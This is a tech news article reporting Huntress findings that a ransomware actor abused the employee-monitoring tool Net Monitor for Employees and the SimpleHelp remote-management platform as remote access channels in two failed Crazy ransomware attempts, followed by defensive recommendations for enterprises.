Ransomware gangs are using employee monitoring software as a springboard for cyber attacks
Two attempted attacks aimed to exploit Net Monitor for Employees Professional and SimpleHelp
Hackers are targeting a popular workforce monitoring tool and using it as a basis for ransomware attacks.
Net Monitor for Employees Professional is a staff productivity tracking tool from NetworkLookout, with features including reverse shell connections, remote desktop control, file management, and the ability to customize service and process names during installation.
In late January and early February, Huntress said its Tactical Response team spotted two separate intrusions in which threat actors chained Net Monitor with SimpleHelp in attempted ransomware attacks.
SimpleHelp is a legitimate remote monitoring and management (RMM) platform widely used by IT teams and managed service providers.
"Shared infrastructure, overlapping IOCs, and consistent tradecraft across both cases strongly suggest a single threat actor or group behind this activity," researchers said.
The threat actors used Net Monitor for Employees as a primary remote access channel, with SimpleHelp used as a redundant persistence layer. This allowed them to blend in with normal traffic, ultimately leading to the attempted – but on these occasions unsuccessful – deployment of Crazy ransomware.
"Threat actors leveraged this capability for hands-on-keyboard reconnaissance, additional tooling delivery, and deploying secondary remote access channels, effectively turning an employee monitoring tool into a fully functional RAT (remote access trojan)," said the team.
In the first case, it's not clear how the attackers gained initial access, but they went on to start trawling around user accounts and attempting to change passwords and create new user accounts. Huntress spotted Net Monitor for Employees' terminal pulling down a file via PowerShell that turned out to be SimpleHelp.
Luckily, attempts to tamper with Windows Defender and deploy multiple versions of Crazy ransomware failed.
In the second case, a threat actor leveraged a compromised vendor's SSL VPN account to gain initial access, then launching an interactive PowerShell session to begin staging their tooling.
They installed SimpleHelp and configured it to monitor for certain keywords.
"Interestingly enough, the SimpleHelp agent was also configured with keyword-based monitoring triggers via GlobalEvents, revealing the threat actor's financial motivation," said the team.
These included wallet services (metamask, exodus, wallet, blockchain), exchanges (binance, bybit, kucoin, bitrue, poloniex, bc.game, noones), blockchain explorers (etherscan, bscscan), and the payment platform payoneer.
How enterprises can shore up defenses
Huntress recommends the use of multi-factor authentication (MFA) on all remote access services, administrative accounts, and external-facing applications and adopting the principle of least privilege.
Networks should be logically separated to prevent lateral movement and all external-facing applications and devices - especially VPN and RDP gateways - should be patched immediately and monitored for anomalous login attempts.
Similarly, third-party software should be regularly audited, with user permissions limited. Elsewhere, Huntress said enterprises should be monitoring for unusual process execution chains and configure alerts for any attempts to modify or disable security software.
Huntress warned these cases highlight a growing trend of threat actors leveraging legitimate, commercially available software to blend into enterprise environments.
"Net Monitor for Employees Professional, while marketed as a workforce monitoring tool, provides capabilities that rival traditional remote access trojans: reverse connections over common ports, process and service name masquerading, built-in shell execution, and the ability to silently deploy via standard Windows installation mechanisms," they wrote.
"When paired with SimpleHelp as a secondary access channel, complete with keyword-based monitoring triggers targeting cryptocurrency activity, the result is a resilient, dual-tool foothold that is difficult to distinguish from legitimate administrative software."
FOLLOW US ON SOCIAL MEDIA
Make sure to follow ITPro on Google News to keep tabs on all our latest news, analysis, and reviews.
You can also follow ITPro on LinkedIn, X, Facebook, and BlueSky.
-
Dell Pro 34 Plus P3425WE monitor reviewReviews A classy ultrawide monitor with a business focus – the good image quality, useful features, and solid build are marred only by the high price
-
Dell Technologies World 2026: agents, hardware, and tokenomicsJane, live from Las Vegas, takes us through her week at Dell’s AI agent extravaganza
-
Instructure chose to a pay ransom following the Canvas cyber attack – research shows more than half of security leaders would follow suitAnalysis Opting to pay ransoms creates huge risks for enterprises – you’re relying on the word of criminals
-
Ransomware negotiator sentenced for role in major cyber crime groupNews Deniss Zolotarjovs was a key player in a group associated with Conti
-
Threat actors ditch ‘spray and pray’ attacks in shift to targeted exploitationNews A dip in ransomware volumes points to a more targeted approach focused on vulnerability exploitation
-
Security leaders overconfident about ransomware recoveryNews Few manage to recover all their data, and many experience business disruption
-
German authorities want your help finding the hackers behind GandCrab and REvilNews Daniil Maksimovich Shchukin and Anatoly Sergeevitsch Kravchuk are believed to have made millions from ransomware as a service schemes
-
The rise of teen hackers ‘makes for a good headline’, but cyber crime activities peak later in life
News With family responsibilities and mortgages to pay, it's not teenagers dishing out malware or carrying out cyber extortion
-
Using AI to generate passwords is a terrible idea, experts warnNews Researchers have warned the use of AI-generated passwords puts users and businesses at risk
-
Researchers called on LastPass, Dashlane, and Bitwarden to up defenses after severe flaws put 60 million users at risk – here’s how each company respondedNews Analysts at ETH Zurich called for cryptographic standard improvements after a host of password managers were found lacking
